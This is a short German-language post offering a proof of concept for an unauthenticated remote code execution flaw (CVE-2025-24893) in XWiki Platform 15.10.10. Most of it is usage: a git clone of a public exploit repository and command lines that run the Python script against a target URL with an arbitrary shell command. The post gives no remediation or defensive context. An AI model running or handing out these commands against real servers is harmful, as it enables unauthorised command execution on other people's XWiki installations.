
PoC | XWiki Platform 15.10.10 - Remotecodeausführung
Eine Sicherheitslücke der Kategorie RCE (Remote Code Execution), die gefunden wurde, wenn nicht authentifizierte Angreifer beliebigen Groovy-Code remote ohne Authentifizierung oder vorherigen Zugriff (Gastbenutzer) ausführen können. Im Folgenden ein PoC (Proof-Of-Concept) in Python für die Ausnutzung dieser Sicherheitslücke.
git clone https://github.com/zs1n/CVE-2025-24893
python3 CVE-2025-24893.py -u <url> -c <command>
python3 CVE-2025-24893.py -u https://domain.com -c 'id'